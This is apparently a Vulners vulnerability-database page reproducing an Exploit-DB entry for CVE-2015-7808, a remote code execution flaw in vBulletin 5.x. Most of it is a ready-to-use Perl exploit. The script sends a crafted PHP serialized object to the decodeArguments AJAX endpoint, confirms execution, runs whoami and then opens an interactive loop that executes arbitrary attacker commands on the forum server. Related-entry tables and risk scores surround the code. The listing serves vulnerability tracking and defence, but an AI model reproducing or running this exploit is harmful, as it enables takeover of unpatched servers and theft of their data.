vBulletin 5.x - Remote Code Execution
🗓️ 23 Nov 2015 00:00:00Reported by Mohammad Reza EsparghamType
exploitdb🔗 www.exploit-db.com👁 38 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| vBulletin 5.1.2 Unserialize Code Execution Exploit | 14 Nov 201500:00 | – | zdt | |
| vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution Exploit | 22 Aug 202000:00 | – | zdt | |
| Exploit for OS Command Injection in Gnu Bash | 27 Jul 202504:29 | – | gitee | |
| vBulletin 5 Connect 5.1.2 through 5.1.9 PHP object injection attack | 24 Nov 201500:00 | – | attackerkb | |
| CVE-2015-7808 | 5 Nov 201500:00 | – | circl | |
| vBulletin Remote Command Execution Vulnerability | 5 Nov 201500:00 | – | cnvd | |
| CVE-2015-7808 | 24 Nov 201520:00 | – | cve | |
| CVE-2015-7808 | 24 Nov 201520:00 | – | cvelist | |
| vBulletin 5.1.x - Remote Code Execution | 5 Nov 201500:00 | – | exploitdb | |
| vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit) | 24 Jul 201700:00 | – | exploitdb |
10
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
$user=$response->decoded_content;
chomp($user);
print "\n Target Vulnerable ;)\n";
while($cmd=="exit")
{
print "\n\n$user\$ ";
$cmd=<STDIN>;
chomp($cmd);
if($cmd =~ m/exit/i){exit 0;}
$len=length($cmd);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "\n".$response->decoded_content;
}
}else{print "\ntarget is not Vulnerable\n\n"}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2015 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 27.5
EPSS0.80635